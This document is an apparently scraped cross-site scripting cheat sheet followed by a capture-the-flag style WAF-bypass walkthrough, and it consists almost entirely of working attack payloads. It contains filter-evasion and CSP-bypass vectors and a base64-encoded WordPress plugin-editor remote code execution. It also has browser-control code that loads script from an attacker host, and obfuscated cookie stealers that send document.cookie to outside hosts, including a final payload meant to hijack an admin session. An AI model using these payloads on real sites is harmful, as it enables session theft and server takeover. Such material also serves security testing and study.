* In URLs: & => %26 , # => %23 , + => %2B
HTML Context
Tag Injection <svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context
Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context
Code Injection
(escaping the escape)
\'-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
Without Parenthesis <svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
Filter Bypass
Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<script <script>>alert('l33t')</script>
<svg><script>alert('l33t')
<svg><script>alert&lpar;'l33t'&rpar;
<script>\u0061lert('l33t')</script>
<script>eval('\x61lert(\'l33t\')')</script>
[NewLine press enter]eval('\x61lert(\'l33t\')'
[\u2028]eval('\x61lert(\'l33t\')'<script>eval(8680439..toString(30))(983801..toString(36))</script>
http://11.xss.labs%[email protected]/x.js
Body Tag <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers <x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onmouseenter=alert(1)>hover me!
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
Code Reuse
Inline Script <script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script <script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding
Mixed Case
Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1='1'onxxx=1
<x 1="1"onxxx=1 <[S]x onx[S]xx=1
[S] = stripped char or string <x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1='
Browser Control <svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input Single Input (script-based)
'onload=alert(1)><svg/1=' '>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1=' */</script>'>alert(1)/*<script/1='
Multi Input
Double Input Triple Input
p=<svg/1='&q='onload=alert(1)> p=<svg 1='&q='onload='/*&r=*/alert(1)'>
Without Event Handlers <script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><x><script>alert(1)</x>
<svg><use xlink:href='data:image/svg+xml,<svg id="x"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<embed xmlns="http://www.w3.org/1999/xhtml"
src="javascript:alert(1)"/></svg>#x'>
<svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYn
J1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIge
G1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsi
Pg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3h
odG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYW
luKSIvPjwvc3ZnPg==#brute>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS <iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload Injection in Filename
"><img src=1 onerror=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Google Chrome
Auditor Bypass
(up to v51) <script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)//
<script src="//brutelogic.com.br&sol;1.js&num;
"><script src=//brutelogic.com.br&sol;1.js&num;
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><embed allowscriptaccess=always src=//brutelogic.com.br/2.swf#
<embed allowscriptaccess=always src="//brutelogic.com.br/2.swf#
"><object allowscriptaccess=always data=//brutelogic.com.br&sol;2.swf&num;
<object allowscriptaccess=always data="//brutelogic.com.br&sol;2.swf&num;
"><base href=//HOST/
<base href="//HOST/
PHP File for
XHR Remote Call <?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC <base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE <script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
Multi Context Source-based
</script>"-alert(0)-"><svg onload=';alert(1);'>
DOM-based
#//3334957647/0/?0=">"<img src='-alert(1)-' onerror=";alert(1);">
CSP Bypass <script/src=/PATH/PAGE.json?callback=alert(1)//></script>
Shortest Event Handler
<svg><animate attributename=x end=1 onend=alert(1)>
Best-fit Mappings Uppercase
<SCRİPT>alert(1)</SCRİPT>
<SCRİPT/SRC=data:,alert(1)>
Overlong UTF-8
ʺ><svg onload=alert(1)>
%CA%BA%EF%BC%9E%EF%BC%9Csvg onload
%EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
Sponsored by Netsparker Web Application Security Scanner
Proudly powered by WordPress | Theme: Big Brother by WordPress.com. Translate »
<script>eval(8680439..toString(30))(983801..toString(36))</script>
http://11.xss.labs%[email protected]/x.js
=== EXTRA HERE AND HERE ===
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
http://d3adend.org/xss/ghettoBypass
https://html5sec.org/
http://htmlpurifier.org/live/smoketests/xssAttacks.php
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Filter_bypass_based_polyglot
====TRICKS====
<keygen autofocus onfocus=bbb=String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,117,104,102,102,114,119,54,114,107,117,57,118,53,99,48,121,102,121,101,56,110,106,57,49,117,115,48,105,111,55,46,98,117,114,112,99,111,108,108,97,98,111,114,97,116,111,114,46,110,101,116,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101),bbb.replace(/.+/,eval)>xsss</keygen>
<input autofocus onfocus=
<select autofocus onfocus=
<textarea autofocus onfocus=
<keygen autofocus onfocus=
<form><button onfocus=alert(1); autofocus>
<keygen autofocus onfocus=write(atob(&quot;PHNjcmlwdD50b3AubG9jYXRpb249Jy8vc2VuZC5oZXJlLm1lPycrZG9jdW1lbnQuY29va2llPC9zY3JpcHQ+&quot;))>
===================================================================================================================
Finding the right Javascript event attribute
The challenge here is to find an event that can be both placed on a HTML tag and is not blacklisted by the WAF/IDS so we can execute some Javascript.
Too bad we can’t use onload= or onerror=. Thankfully onfocus does not seem to be blocked by the WAF/IDS. It has the ability to execute Javascript when a HTML element is in focus. We can force this focus with the HTML ’autofocus’ attribute:
<form><button onfocus=alert(1); autofocus>
Now we still need to beat the WAF-IDS to inject any useful Javascript. Above won’t work because alert() is blocked. We will do the following 4 things to allow us to execute any Javascript:
Create text with String.fromCharCode()
Create an anonymous function
Access the function ’document.write’
Create the native function ’eval’ out of a string
===Strings===
Creating strings with ’String.fromCharCode()’ is easy, we can put our ’eval’ here and the rest of our payload.
Obtaining eval function
Now we need to somehow convert the string ’eval’ into the native eval Javascript function:
x=String.fromCharCode(101,118,97,108);
x=this[x];
y=String.fromCharCode(97,108,101,114,116,40,49,41)
x(x(y));
This will execute ’alert(1)’.
===Anonymous function===
As for the anonymous function, we need to make it like below:
onfocus=(function(){ alert(1); })
else the ’this’ in ’x=this[x]’ wont work - we need a function scope where we can operate in.
Obtaining document.write
The only thing is left is find a way to use ’document.write’. Luckily, this is easily done with:
a=document;
a.write(String.fromCharCode(......));
Now we can finally put everything together. Lets inject an img tag with the src attribute set to our cookie stealer.
<img src="http://example.com/?c=COOKIE_HERE"/>
Final payload
<form><button onfocus=(function(){a=document;x=String.fromCharCode(101,118,97,108);x=this[x];y=String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39)+String.fromCharCode(60, 105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99, 61)+a.cookie+String.fromCharCode(34,47,62)+String.fromCharCode(39,41,59);x(x(y));})() autofocus>p0wn3d
1) admin visits page
2) document focuses on injected button
3) javascript will be executed
4) Cookie sent to our server
Use the cookie to login as admin and retrieve flag.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment